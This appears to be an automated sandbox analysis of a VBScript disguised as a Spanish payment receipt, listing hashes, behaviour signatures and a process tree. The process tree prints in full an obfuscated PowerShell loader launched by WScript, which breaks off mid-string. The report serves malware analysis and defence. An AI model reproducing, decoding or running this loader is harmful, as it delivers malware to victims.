e5f3503e7e13fbd6944429f7cdc31515a464a0852400d244d385753fffcb74b0

Resubmissions

30/11/2022, 23:19

221130-3a6ygahc3x 10

30/11/2022, 23:08

221130-24zktage6s 7

Analysis

max time kernel
210s
max time network
180s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
30/11/2022, 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Comprobante de pago.vbs
Size

458KB
MD5

b850dc23232f57ca017501c3466e2dae
SHA1

32955a66920f793b29b9c759e94b937444fc9e67
SHA256

2474c4600024152198c6343099f27f6738c91331f20845fa098437ccc292c774
SHA512

d1a9705b750b84579e41047776cb09622464e1a55c990ac1fb4167b52d58304d29884e6b381ba486f4ff6d9590bda55b2d71cca612ae4b0031622cd9b6091e94
SSDEEP

6144:vABlsHrxVHvRQn/pdizJ2lqNgNr8PKIfg2LY40gPbN8oKsCFIl/:qlsHrzHv2n/i8o0r8Pzg2H0mKsbt

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4032	powershell.exe
4032	powershell.exe
4032	powershell.exe
2976	powershell.exe
2976	powershell.exe
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2660 wrote to memory of 4228	2660	WScript.exe	66
PID 2660 wrote to memory of 4228	2660	WScript.exe	66
PID 4228 wrote to memory of 4032	4228	powershell.exe	68
PID 4228 wrote to memory of 4032	4228	powershell.exe	68
PID 4228 wrote to memory of 4032	4228	powershell.exe	68
PID 4032 wrote to memory of 2976	4032	powershell.exe	70
PID 4032 wrote to memory of 2976	4032	powershell.exe	70
PID 4032 wrote to memory of 2976	4032	powershell.exe	70

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Comprobante de pago.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$redans = """opFDruVinRecTetdeiGeokonLa InHNeTalBTe He{un Si Ge Em vrpsoaUnrFuaCemCo(De[AlSPotRerIniUnnSagEr]Ch`$LaSAukTrrErmSuiTonAsdchdScePhlCaiInnKagcieTrrMosBe)Wa;Sc Ub Ur Hy Hy`$BaSTytSutFueSesSkksmiSupMapCoeDirEsnBreJesBicSchPreFlnPaiCaade2Sv4Sp No=Sk StNSveSowPr-InOArbNojpaeStcBatDr OvbChyWatUneFi[Bo]Va Lo(Sn`$GoSBakNarBlmAfibanUpdStdTjePolBiiNdnPrgafeOvrWoseg.SpLuneNynfogIntZihsh co/Mo Pa2ha)me;In Tr Gr Ba AdFDooFirFi(Pa`$LkBBalSieAfbWylAfoAmmfuscotSl1Di2Sd1Ne=dr0Wh;Le Pa`$MaBSmlSteScbenlFroDomInsOvtAa1Un2Un1Ta Op-DylFltDe Pa`$AfSSukUnrStmSwiHunBgdmedFieOplUpiKunGogElePlrChsTj.MaLSuespnMagKltpfhEu;Po Sk`$MiBOplAfeInbHelProWamUnsRotWa1In2Pr1Ro+Se=Ki2ed)Pe{Ab en Un af Al Ca jo Hv Fj`$AmSPrtHvtSueGrsAfkFiichpHepSweFlrAbnTieSwsAccarhYvesynDoiFlaSp2Ve4Ti[Un`$EkBUnlIberebSplProFrmTosIstNe1en2Ko1an/Bl2Ug]bv Un=Fo Fl[HacDeoJvnEtvspeAnrBitZi]Re:En:ArTLnoReBBryPotByeBa(Ce`$uoSMikperKlmDiiBrnRedGedwieNolHjiFrnLogFreMarOxsCa.SpSKvuSubGlsVitStrFriPenDegKr(Ma`$foBAflPreRebTelPloTrmLusVitUn1Si2Ba1Op,Iw Du2pn)Wl,Ep Sy1Ra6Me)Th;Un tr La`$SuSFotAntSneSysOvkFoiJhpCopHaeAnrTenPoeHasMucUnhbeeRenOviAmaIs2No4Ne[Sk`$AfBFrlSoeAmbMolOuoLomCusJatOp1Ko2Tr1In/Si2Sv]Va Pl=St Ma(Vi`$CeSDetAntHoeSksUskNoiPspBupDaeNorKunBleFesArcYahAneSynGuiSmaSt2Ha4Ud[Ov`$AbBPelBreFobColIdoremFlsSytKo1Wo2Sa1Ar/Te2Fl]Ph tr-BobUdxCaoserun Ma1Ap9Ta5Ud)Bn;An pr In Hj Ad}Eu Le[SkSSttDirSpiBlnKegFo]Ba[MaSAnyDisEntPreInmGa.ArTSkefoxAitLi.MoESanSecHuoOedTuiFunIvgFo]Aa:Hy:HuASuSTeCKaIFrICa.maGTrePrtOvSGitJorMeiSunSlgAf(Re`$AcSmatFitUneWasDokPriLapunpDeeKlrFonSueMosSlcTahcieSpnBaiSpaDi2Br4Mo)En;tj}Sk`$RaAOvfPatDueGynSekAujFooHolmoetarTrsPo0Pa=AnHDeTOsBco Sl'ag9Db0HoBCaATuBSh0unBNo7LaANe6IsAFrEesEBrDEjAFe7MaAPrFAnAMeFSl'St;No`$DeAunfFrtFoeSinankCojIsoSplSteDurRasDi1tu=SaHSuTTrBTr St'In8BiETaAReAdeALo0hyBRe1UgASuCEnBin0TaAPoCWiAHe5DeBDo7LaETuDDj9Fo4saAPsAReAImDPaFVe0BaFTu1UnEvgDTe9Mo6AdAstDScBme0OrADi2UdADe5FrAsi6Fu8IrDInABa2BoBOr7ThABrADaBIm5NoABr6Un8PoEMaAOp6SeBYd7DeABrBTeADeCRaANi7PrBAk0Lo'Bu;Re`$OpAInfSmtAdeVenDukNojTioOplpreInrArsBa2Fe=ScHCrTAsBRe Zo'Ha8Fe4HaAno6prBAm7In9Ba3GaBSo1SaAAfCKlABi0Bg8Zo2LoAIn7AmABu7AbBSt1ViASo6TiBTa0StBAm0Dr'Sa;Hf`$BeAStfKetStePanHakMojSkoLylSeeForSusVi3An=RaHtaTLdBKo Mo'Fi9Pi0SkBAfAStBHj0SuBUn7SwASt6feAFeEPeEAqDLu9Ab1UnBDo6edAFiDMiBPu7BoADeAFoAHeEReADe6KrEReDTr8InAStAPuDOlBMa7ReABu6geBSy1UnAPaCUnBYc3Ag9An0BaALo6AfBPr1BuBVa5BlAAgABrASh0FoAem6BuBBi0IsEInDRe8blBJuAUb2SaAMeDMeASt7AcAKaFTeApl6sn9Pe1MaALa6PoAIb5Do'Gr;An`$EnAStfCrtUneWanflkAfjTroImlPoeNorAnsTa4Wh=ByHUnTdhBBu Cl'DiBCa0adBDi7MiBEu1QuAReASeAKfDJuAAn4Na'Ex;st`$BaAAkfretBoeSpnUnkHajThoFalAneexrPrsFe5Co=gaHAuTBrBSa St'cl8st4biAFr6UnBCo7Ac8EmEAnABeChoASc7RuBSk6SaADoFGnALo6Un8PlBHyACo2PrACoDUmATr7CrADiFJoAPo6Al'Ni;Be`$HoATafSitetetrnFakAnjLfoFolDeeFurFosPa6Gr=unHNuTPrBTy St'Xe9Cl1St9No7Na9Bl0CeBEr3ReALi6ThAMo0ShADiAPlAAr2LaALyFbe8RiDClAMe2MaAPeEgaAUn6SlEVrFdyETr3Af8UlBStAEnAOvAAt7BuAFi6Kr8Ho1MaBStASe9Kh0MaADaAMoABo4CaEbrFLgEHe3Pr9Ja3lsBOp6EnAsn1SkABrFFoAFlAMeAVk0Ge'He;Pa`$DiAPafTitBaeJenNrkPrjSpoEmlgeeSyrAfsFi7Ud=ScHViTTrBGe ha'im9Un1DiBVa6TiAWoDFoBAi7KaABlAArATiESpAUn6UnEWiFUnEAl3hu8JoEReAUn2brALaDMeASw2ArAbr4AfAre6FlAdd7Ai'Ju;Ps`$MaAAnfSctfoeLanOvkStjBuoQmlApeRerSksAm8Tr=SmHChTMoBPo un'do9ur1TrADr6PoAli5OrADjFEnAst6CoASl0PrBSp7ReAFi6UrALo7Te8Pr7NdANa6DeAfrFReASp6FoAFo4UdAKl2MeBSi7PeANo6Et'Ac;Ge`$AmAOpfUbtSteManHikUnjAnofrlTaeFurVisDo9Po=PuHSpTMiBKv Cr'Fj8KrAHiAFaDKi8BeETrAfl6AlAGrEKiAMiCKlBst1HyBKeACu8PcEHeAHoCOvAHy7SkBFo6FrAPrFSlAAm6de'Ge;Bi`$TrSChtDirSlaRefStfPoaUnsIntprsVitcetsyeFalHysoreCa0Tu=SuHOrTSoBTr Re'Ch8UdEApBUnAKn8Se7ArANo6riAArFSkATy6FoAMi4otANo2UnBOo7NoAUn6Ai9re7RvBUnAReBRe3KaAKm6Fi'Su;Di`$SvSLatRorNoaBifBgfSkaTasBrtOvssttPatHieUnlSpsTyedy1Re=SpHViTScBnu Lw'Pu8Re0OpAReFUnAPr2GnBMe0ChBMi0MaESpFRaEpa3Ru9Di3SeBCh6MiABa1ElAFaFVeAFrAEsAde0BiEGrFHyESe3Re9Af0LoAPr6VeALa2KbAFoFMaARe6SuAAc7ElEPoFhyEHo3No8Sp2StAOvDArBHi0XeAMeASk8Tr0OrAFoFGoAAc2SrBMa0AlBtr0PaEShFViEDa3Ci8Ad2SpBNo6ElBHo7HoAveCpu8An0BlAToFAcACh2ReBCe0BuBap0Su'ch;bo`$VvSSatWirViabefstfSeaLosOftHasZitArtImeAblBosAleAr2Fa=SeHElTRuBsp he'Ho8HiAFyAPaDNoBBi5PrASuCMeAUn8AdASk6Su'Fy;Fr`$FjSTrtHmrLyaHefStfKoaResCrtFrsUntettPleQulamscaest3Tr=FiHMoTKvBIn Un'kl9Tr3SmBCl6NoAJe1StAFeFUnADeAunATr0NaENeFSnEFa3Du8BrBNoAmaASpAIn7JaAUd6Sj8Bu1PaBSnAfe9Be0UnAMaAUnAse4grEMeFMeEPi3mi8KaDheAre6GeBFo4Tu9Re0MeAOvFWeAPrCHyBUn7PhEHeFDeEGi3Op9Se5XyAPrARhBBe1InBCo7FoBFa6StAPr2roAAfFBe'Py;In`$VaSMitVkrmiaNofFifVaaunsCutKasCotUntJoeTrlUnsSaeKv4Ko=CaHSkTJeBbj Sp'Dr9Ko5DiAJaAElBDe1MeBAn7SvBHa6HeARe2StAMeFIn8Ne2FeAStFDeAEmFOmAGoCPaAKr0Sc'Fo;Ve`$FoSJatSkrCaaCofJefPeaFosSotLasUntFatLyeBalLesPleAn5za=VvHGuTVeBEn So'BoAMaDSkBTh7UnAIm7ReASiFTeALiFOp'Af;Gr`$ViSSptMerUnaCufSifUnaDoslitBlsWetIntSteemlLesTreDi6Fu=TiHDrTEfBVo Un'Ps8DiDTiBma7Ba9Is3FiBgn1SpAToCDyBBa7TaAFr6SpARe0SpBMa7re9Nu5SpASaAAsBBr1BeBTi7ExBAn6SlAHa2NoAUnFSo8MaEGrAAt6PoAKoEFrABaCCoBOv1WoBPaAPr'Sk;Dw`$SbSSotStrFraTofSpfbeaGusPotMisPutOvtVaeColBisBaeTr7So=acHJuTBrBAs Af'Co8AkANo8Lo6be9AbBRe'un;Hy`$ToSFotPrrVaamefPlfPraInsSutSisCatJutOlegulUnsesePe8Ek=doHScTKoBDo St'Ac9FaFOm'Ox;UnfIcuMinSycDutFiiSeoOpnfe OkfJakPdpOu Co{BrPSkagurLaaBamAm Re(du`$loFKolByaThgMoeOglcolSjiAvfmuoBrrOumBr,Fo Re`$AfTSpiSulPamInachaSklDeeDonHjdBaeHa)Gl Ri Bu Sp Am Te;Dy`$HyMJuaLecSnhAriPecusoUnlNoaantNoebjdGg0Ho Du=StHSoTHoBTo ne'OvEAf7Li8MoEwiAKl2OlAKa2suAUc7ElAOr6SeBFo1LuBRa0ToEun3NoFsyETaEFi3KoEAcBPa9Af8Wh8Fr2ErBCa3CoBEc3Me8Va7KiAHjCFrAUnEenACs2UnAKrASpAPrDAu9SuETrFCh9FeFSl9an8Lr0UdBUn6OlBBe1CoBVo1DrAPh6ViADeDBuBSl7La8Ag7ApALoCNeAGoEOvAJu2dyAOrAAaABeDAsEHoDIn8Ga4StADi6FaBSi7In8Ca2PhBYe0UrBSk0crAau6TaAneENiATe1reABuFPlAWhACrAFo6SkBBo0BaEVuBDoEPaASoEFo3VaBUdFIrEfi3Mo9Du4SoAPaBAgAVe6ObBBr1ShARe6DeELiElo8VeCVaASt1ArAFi9ExASt6TeAEv0SyBUt7DuETe3UnBUn8BiEAn3FoESo7It9PaCUnEHyDUn8Ov4TsApaFOsASpCUrAtr1AnAAv2ObAInFre8Lu2KrBOp0WeBPi0OpASa6BoAInEphAFa1DeAUtFStBafASp8Cr0BeASu2AtABe0DeAAmBCrACl6UsEUr3TrESpEHa8Da2DdAAsDBoASa7snEIm3FoEob7St9StCChEShDCa8OpFFoAMiCAnAIn0TrAOb2riBHe7BuAPrAGiATeCUnAEjDChEFiDAn9Sa0FrBBl3PaAOpFTrAOpAMiBIr7FoEKoBOvERu7Af9Ap0OpBFr7RvBfo1ExAEm2ThAUn5KrATi5InATt2UdBAn0QuBKo7KaBRi0CoBIs7DeBba7BaACo6teAReFtiBSo0UnAli6AkFBeBFaEBaAUn9Bo8LaEPoEPrFEx2Wa9JeEHoEBrDRe8Hj6WaBFu2TrBOt6OsAEv2AaATuFDaBEm0naEGaBbiEKl7Ca8Ti2BoASu5NyBAn7KyAOm6FaAAnDFlAAk8VoAte9DeAPaCAdAPrFAmAUd6PeBVs1SkBKh0ZeFKo3KrEBrAisEso3ImBInEUdENeAPrEstDSu8Hi4ReAOc6PaBEm7Ef9Bo7MoBFlADuBmi3ViAPl6LaECiBUnEMe7Ko8Cr2AfAMo5RaBTe7SkAVa6StAToDMeAHa8peABk9NoAStCCoASpFBeAEm6NeBTa1MiBDe0InFCe2PaEKlATw'Sl;Am&Fr(Ba`$MoSMotStrDiaDefAnfChaumsActExsUntSutmeeSmlPasIceAr7st)It Jo`$stMasaauccahVuiUncRaoEklReaDitIneKodOv0Le;Zo`$BaMWiaLicPuhDaisacGgoStlTraSatSmeStdNe5St Af=Il PeHUdTTiBra Tr'DeELi7Ha8AdCFoABiENoARe8DuACeCCoBKl0baBJo7AlAOvDAfACeAExAPlDFiASp4kvBLi0InAReBGoAAn6GrAStDUnBBr0OmBEgAHyAJeDRyAIn6UdBtu7riBSo0TaESc3BeFReENoEFu3MeEIl7an8AnEDrAPr2GrAFe2BaAEv7JuABa6UgBFi1StBFa0UlEbrDPr8Mu4AnAGe6SkBUn7Ha8InESoAFa6IdBCo7CoAThBCyAVoCOvAAc7AnECoBLtEDu7Tr8St2BrATo5FlBbi7TiAUn6suACaDgtAMy8unASp9SoADiCRtASnFCoAde6ReBMe1NoBra0OpFTe1RlEWiFinEBe3Vi9Pr8Ri9Pa7ElBCeAAxBVi3StACa6Pe9Ts8Ge9HaEHy9BvEAuEDb3Ba8un3DaEBeBAeEfi7Ch8Pr2WrADa5PrBFi7ErAdr6ThAUdDUeARe8AlAPu9SiAKlCTaACeFstAly6SkBSa1SpBVi0EmFMe0AnETvFVrEIn3SpEUn7Vi8sm2ArASd5KlBau7AdAFa6QuAmaDWhAEn8UdANa9NuAApCKoAdeFTaAVe6HyBMi1IsBTr0DeFSa7UnEFoABrEGrAHu'Ko;Br&St(Re`$BaSAdtStrStaIdfStfBaaspsCatSpsAptIntEpeInlAmsTyeUf7Tr)Cu Pl`$TiMUbaEkcAfhBiiRaclaoAulziaCotAdeAfdZe5Af;Ru`$KaMPaaCocprhMiiTscUnoRelGaaBotpreSedCo1Ex Tr=Th FlHFjTBlBSt Un'plBIn1InABi6OeBSt7MeBAl6DiBBi1SmAScDPaEMa3UnESa7Ar8CrCTeAElESkAJa8SpAElCGeBFo0SkBLe7SmAmaDUnAMaAReARgDTrAWa4GrBKo0NoABlBsuAHk6neAGyDPaBYe0TeBNaAStAAcDCaACa6ChBTo7ElBBr0ApESaDDi8FlAOmAsuDvaBRa5CrAasCGgATe8DiAAf6LyEFoBSlELo7EaAHyDAnBTr6TrAIdFGeALaFSkELeFaaEve3Na8Vi3FaESaBpa9Ur8vo9In0MaBLeAEnBod0MiBSp7MaAMo6EdAEnEAlETeDEc9No1UdBSk6RuADeDBeBPr7FrAHeAUdAagEFrAUn6ReEDaDAp8HoAArAPoDKdBPa7InAOp6NuBsa1SmAPoCPaBMe3Wa9An0TaATt6bnBSp1OvBRa5DyAstAreAPi0FoASt6SkBAw0SpEEaDGr8PoBjeATf2GrAaaDdiAVe7ApAStFKoAUn6Pi9pr1PeAFo6ShASa5Fe9ExEinESkBCa8chDAdAAs6KoBFa4BrEPeECo8MuCUnAAi1ReALi9DaAMa6StASe0AtBEy7DaECh3Eu9Th0BeBPrAHoBTy0ArBSt7AlASm6EcASwEBaEOpDUd9Ps1HeBKn6quALuDLiBke7DoAPiADeAKoEObAFa6FiEBoDDi8baAsiAMuDStBFo7AmAKo6MeBSk1CuASuCPrBGy3La9Sc0GrAIn6FuBTa1OrBDe5MeAleAPoAFr0CuAVg6PlBBe0noETyDSo8DiBleASk2LoABeDNuACu7PaAGrFViASa6An9ad1LeASe6OmAKe5ClEpoBSpECiBHj8PeDTiAUn6PaBSm4VoEMiEDe8flCKlAFl1GlAKl9LeASl6FiAca0OrBSe7RoESk3Dd8OvAUnAOpDPoBAs7Sn9Co3UrBUn7InBEf1NeEDrASuEPoFKaEUn3guESaBEnEPe7Ya8SoEAnATh2SaAGe2SeAFo7LeAGb6BeBAn1HeBPe0ThETeDOv8Zy4KiAkl6foBCh7Ti8BuECeAst6GsBAn7TiAUdBUnASkCGrASk7YnEExBKlESy7De8fl2DaAPn5ChBIn7LiAPl6TrASaDTrALe8SuAki9AjAOvCGeAElFInAFo6stBUn1DaBBr0SpFLi6EvECoATaEovAfoESaDAp8PaABlAHeDImBGu5BrAbeCDrALa8UnAAl6tiEScBBaEDe7HeAunDHyBPh6EnAPrFBrAInFSoENoFInEEv3sa8Hi3EmETeBEcEHa7Le8Re5PaAKoFfeATw2FiAWr4HoAmi6RyASpFSkAChFRmAReAStATy5PrAClCTrBSk1CrAUnEUnEEnARlEKoASeEMuABlEpaAMoEBeFDiEFu3FaEAr7Vi9Be7GrAUmACuAPaFSlAWoEKaABa2AlADo2HyAXeFGlAHy6ScASlDFrADr7FeABu6LaEJoACaEUnAOp'Sh;Or&Fy(Ge`$sjSSetMirLoaBaffafPjaFrsPotSksJetHjtUneUdlGrsRheDe7Fl)Be El`$MoMUdaUncsehRuiAncPooAplOpaSptTieDidUn1Ha;Kl}CofRouChnSecSttGliJaoLanPr JuGMiDReTTr Nk{anPDtakarKoaUdmba Ne(bo[StPLeaSurFrakimHoeIntMaeFarde(TrPLaoEvsMeiRetReiUnoSunPe re=Vi Re0Dk,fo InMVaaHunKodGraNatcaoBrrFryRe Tu=Su Cr`$ArTNerFouCoePr)In]ba Tj[UlTSeyGrpKoeSk[Sk]te]ke Kr`$BvOVevEfeKarEvpBeiUnnOpcJehopiDenFegSy,Hy[TaPBaaTrrEnaBamByeSmtRoeHerAl(CiPunoMasDoisptSbiagoStnFi Pa=ig Op1An)Ou]Er ja[arTUfySkpBreLa]In Lo`$BlEHevEnoBrlPrvBoePosBr Ko=Ra Sp[JeVLaoSkiModTa]Pr)Ka;Ba`$NoMReaIdcSehEgiFacImoEnlCoaGutImeBudEx2Um go=Sa DaHPrTPuBAk Gu'EsESp7Mo8SkESiAMg2ApBNo2FuBSk6FoAAr6CyBNo7AnBTo7FaAOv6PoEKr3BaFFrEDeEMe3Ma9Tv8ta8Ha2plBIn3MaBac3Fr8No7AkASaCVaACrEUsADa2BoAchAShARiDKa9ReETeFGy9FoFSo9Fl8Gu0ShBPh6PyBFo1DeBSu1pjAGy6NeAVaDChBOb7Op8Bu7DeAInCguALyEShANo2InABaAInAUnDArEPrDOm8Du7UdASu6CaAFi5LeAEfAReABeDThAUn6Fo8Fo7BrBLoASkAUpDKaARe2NiALrEDaAouAPeAFi0Sy8So2GiBKi0JuBPe0NoABo6AnACaENaACe1CoATuFTrBCyAimEbeBPoEUnBOr8SkDSkANi6HeBOv4HoEEnEch8FaCDrAKu1cyABe9PrAGa6erAEf0QuBBi7SeESi3Dr9Sa0CoBVeASaBHy0EmBCo7CoAFi6DkABoEFuETyDTo9So1FrATr6InABe5SvAMiFDyAKr6miAOl0HeBFo7SnAPrAOrADrCElAFrDLgEreDBe8Fj2SuBIn0LuBSt0QuAVo6KrACoEFoASl1GeAEnFEmBDyAJa8RaDUdAma2stAHoEEnATh6CoEMoBRaEAn7Be8Kt2CoASa5PeBRe7GrALa6stAhaDPsAVa8MaARe9InAUnCAfAdaFKuAVe6MiBfu1SyBUn0UnFSuBLeEBoARoEOdAWaEteFCaEst3Zo9Ra8Kr9Ek0FlBSuAfdBCo0BiBSt7StASu6frAReENoEPoDol9Co1EnAPe6PrAYe5SpAStFFlACr6OpAPr0PrBLa7huAWaAPaAfrCOvAVlDFiECoDUb8Ko6paASeEinAMoASvBPr7EyEUdDSm8Ur2ShBun0PrBsl0avATv6LiAbrEEnAUn1TiAOsFSeBClAAn8Un1CaBFo6FiAcoAShAAfFSkAKi7BiASl6SuBLo1Ad8La2beATi0ScAUm0AdATr6StBPr0ImBKe0In9HoEFoFSi9VoFBi9Ch9Re1CoBNo6CoAHoDTrESnAOsEGeDSe8Tr7RaAIr6FrASa5AsAUnABrADkDCoAFe6Fe8An7efBStADeASpDIlATo2PeAFiEFeAQuANuAPo0Ro8ScEreAatCOvANo7DaBBo6KuAFoFThAPr6HoEKiBPiEAc7Ca8ro2esAUl5GlBHj7skAHe6TeATeDemAsp8MaACa9SeACaCbeASaFInAem6TrBsl1ReBAy0NaFSlADaELaFChEMe3AfEGr7SuASt5EnARe2MeAToFDoBVi0RaAbi6FoESaARkESpDBe8He7ClANo6VeAGo5ShABlAMiAToDBoATo6Un9Mi7HoBPeAunBZo3WeASl6plEInBneESu7Ta9Pa0UrBIr7FoBUd1caAAb2PrAGr5UnAin5BaACo2AtBBa0MeBPl7DaBMe0EdBIn7krBRe7moAfo6VaAKnFOlBNy0UnAPh6VaFBo3veESvFBrETj3PlETr7De9Kl0ReBAd7SuBRe1UnACe2FlAIn5PfABr5KlAPr2AnBUn0FrBGl7IsBBo0RoBWa7tyBfj7RaAHo6UnAEsFUdBMe0DeAEt6SwFGa2SaELaFSkEMi3In9Mo8Sp9Pl0PaBStAPrBAc0SiBEn7ErAMu6SuAKaEElEKdDBi8SuESyBSt6PrAMaFAaBRe7DrAspACaADi0EcATv2CoBCa0BeBUn7Sp8Hn7NaAca6PsAReFTuADe6WoACo4laAGi2VeBEm7RbAJo6Je9unEKlEReAAa'Di;Sm&Kv(Un`$omSSutUnrHyaUdftrfJuaAgsGatFisCutSytEuePrlFlsineEn7Sg)Pr Po`$joMKvaDocKohGriCocHnoPelOsaGetUneOpdKv2Ha;Su`$HuMdraEpcFohViiAicPloUnlAkavitZieBrdCi3Op Re=Bo TjHKoTUnBre Fo'ArEPa7op8BrEUnATi2BeBPi2HnBZo6BoAIn6GaBsi7SfBPo7DgASi6PiEOvDTe8Im7ReAFo6ImACo5PhAAfAVoAFaDTwAPr6He8Zo0CoANuCAdAKuDDuBJa0KrBFr7EmBSc1ChBSt6SaAKo0CoBEr7SlAUnCHsBFr1ReEMeBTeEre7Fr8Ra2adASp5NoBOf7RiAPr6MaAGuDPaAji8EcALa9HaAToCGrAShFGrAMo6GrBCu1FoBMi0SpFLe5EvEBiFDaEDe3Af9St8Fd9Ru0SvBFrABeBSh0FjBSo7OmALi6CrAFoEScEUdDLv9Fr1FeAEm6BaADi5CaAAlFSkAJe6CeAFo0MiBBo7HaAgdAVoAPrCBrAOrDPuEUdDho8Ky0FoATa2FeAStFKoAByFTiAAyALbANoDCyAUs4In8Mo0AlABeCItAMeDElBRa5SnAHe6FaABeDTeBMo7FoAPrACoASiCStABoDKoBUr0Ov9AfEInFBu9muFTr9ny9hy0CaBBl7BoARu2InAraDDiAOv7BaAEl2MiBPo1OrACa7DaEFlFwoEPo3ReEBr7Go8ReCStBLi5ViAGu6caBSt1vrBAp3SlAPeAUnAChDJuAHm0LoAGeBStATuAStASkDScACh4AgEInApoEdeDTe9Re0NoAOu6OpBbi7An8LiATrAKaEpaBSk3BeADiFTaAMe6CyAG EGrAKu6BiAEsDfaBSt7ScASa2FoBHu7unABiAroASoCAcANoDPr8Re5FoAMiFReAKl2boAMi4naBAp0NoEInBCaECr7Re8Fa2OpAAn5SeBWi7SuAjo6FaAnoDAfAAf8AnAHo9CnAAmCDaAUnFHaAOp6SyBPo1UdBBe0InFVi4CoETeAOb'Be;Ac&Ca(Id`$UdSRdtPerPraKofKofBiaAbsSktEmsRetomtSkeMolmisKaeDa7na)Oc Ca`$FaMReaOvchohStiAmcDaoColSeaVatsleSudBa3Pr;In`$PyMNaaOpcOmhUnistcLyoPelGeaKntSkeundBr4Ta Ta=sp OvHEmTRoBNo go'LeEFo7At8FuEQuAMi2VeBGl2ReBCl6RaACo6guBSk7SiBSk7DaAFo6CaEAdDUt8Fr7DiATy6ArASp5VaAPuAShAReDanAEl6To8spECaAVa6SlBNe7InAPaBSjAExCPrADe7SkEfoBHrEEp7Po9Ko0TeBAl7FoBTe1SaAWe2IaASc5TvABa5OfAHe2FaBDu0OvBOp7OmBOv0HaBpl7FaBUb7SpARo6OvAPrFChBRe0SlAMa6MyFSu1RoEClFFoEHe3AsEAu7Ch9Si0MaBSk7GuBAf1HoAOp2FlASt5SkAOm5ToACa2MiBsv0EnBIm7PoBBl0RiBDi7BrBSu7TrAAa6PrADaFVuBPe0FaASc6ScFAv0unEUnFPeERy3doEUn7Pe8Gr6DaBFo5AvAAmCprASeFPaBHo5ClABa6OcBRu0BlEulFAzEPi3NoEHo7Lo8ThCFoBRe5coAsv6FoBCa1OrBOc3BrASkAHoATeDUrAFu0ElAusBSiASrAUdAneDApASt4PoEPoAteEHaDJu9Vi0miACo6AfBud7Mo8BlAMoAMeELnBSu3MeALeFBoAMi6SkASuESnAZa6udAKaDHeBSy7HaAbl2NoBar7GrABuALeAGiCUnAMuDSi8Fu5UnAHaFDaAsq2HjAvr4PiBbr0PsEThBSuEco7Pi8Ch2KaApe5KoBBl7TaAAf6StAAnDMiAAl8JiATo9FoASpCZiATrFGaAUn6biBHu1IrBHo0LiFGe4TeEIlAGr'Be;An&Pr(Sk`$SaSSitAnrInaUnfMifLeaFosOptEmsDetDatAueHrlUdsvieCh7Al)St En`$SpMMaaCocVahFriFrcReoDilFyaintSpeFadPh4En;Af`$BrMOcaancMehStiKacSnoUdlNoaRitNueindpr5dr Kl=Re LvHOvTRuBSp Lb'OmBHa1FoAAn6foBDe7ApBFr6GeBem1TeASnDUnEhi3GuEba7Fa8HyEOvASi2ArBKv2StBIn6CaABl6PaBPr7HeBPa7RoAOf6GaEFlDCy8He0UdBFo1NoAPo6BeATo2TeBvv7VaARe6Hj9de7SvBAnAAfBNo3LiAbe6WhEMiBbuEUsAud'Tu;Le&Ud(He`$UnSputBlrPuaCofRefMuaAksBetBasIstCatNoeAnlKisMaeFu7Gu)Wa St`$TaMNoaNycexhAriRecCioDrlOvaSttseeTydFo5Ba in Ha Uo;Es}Ob`$HaGStaBrsLetDerPooVlcMroSelDioInpKitMuoSosSsiTksDe Pa=Di MuHjoTIcBBo In'NeACo8StACa6ArBtw1UdARuDGrAKr6EdAUkFsyFKl0BaFAt1As'Ra;In`$BeMVeaRecTyhCuiUncSkoNolNoaBatDieDedUd6Ro Mo=Bu PuHIcTStBsi Tr'PhEPr7Eo8CuBPiAUn2IcAfrFKaATrFMaAPlCHeACh6UnATr7AnEBe3AcFSpEStEBe3Sm9Ko8Ge9Ka0AmBAfAAwBhi0ObBGe7syAUd6leABeETiEEuDDe9Ca1EmBPa6CuAInDKuBSa7ouAGrAOrAGeELyAUn6HiEHjDSt8CaATrACaDExBKo7MaASd6AcBHv1KuATrCPrBSc3Bl9Be0LuAre6AfBin1UnBEk5PrAUnARiARe0RrASi6PoBTo0WaEanDDy8TaEReANo2goBGe1SkBes0urAPaBSpASp2anAriFRe9InEUdFAd9CoFSt9Al8Cu4SaASt6ToBGe7Ge8Be7ChAEx6TrARoFRyARa6SlATr4DeASh2CoBPr7PuAHu6Ex8At5TeATiCsnBVi1sl8Pu5FaBOv6TaAFuDSfAFi0GrBEl7LaACaAPeABlCTrATrDCo9Un3FaABaCNeAPeAShACaDUnBSi7SyAJo6PrBSk1hyEMuBAnEAsBFaAaf5foAAn8EfBMa3ArECo3AdEPa7Vi8sk4haABo2FoBIi0LoBAu7koBGr1ViACoCFaAVe0FpAPhCSnAScFDeAUnCSiBBr3DiBOg7SkAAcCAlBKo0saACoAUnBBy0KoESt3SuEFi7Ru9Fa0TjBBu7RaBel1guAAu2SpADo5DiATo5SkATr2FoBCi0siBAd7TmBBe0UiBSi7FrBJa7OuAKn6VeAFoFLaBAk0KaAIn6MiFLu7SkEUnAChESgFChEhr3SnEapBkr8Kr4Co8Ro7Gr9Tr7ThEFe3Fi8Fj3FoEovBPh9va8Ec8obAstANiDBeBAr7Pa9Ma3DoBMu7AnBTo1St9ReEKoEGiFPaEsk3Un9Zi8fi9Ma6Lu8BaABoAVbDOlBBl7ArFVa0KuFKv1Fa9GrEPhEReFGnEGr3Ra9Un8Mi9fo6Sc8TeANaAQuDkoBCu7PrFSn0ReFUd1In9FoEpeEElFBrEId3Al9di8Po9Af6La8LuAMoAOlDAfBGa7EfFSi0KoFSe1ca9EkEBoEVaAPjEwa3XoENoBTo9Ly8Ov8BrAsoABuDPaBVa7Un9n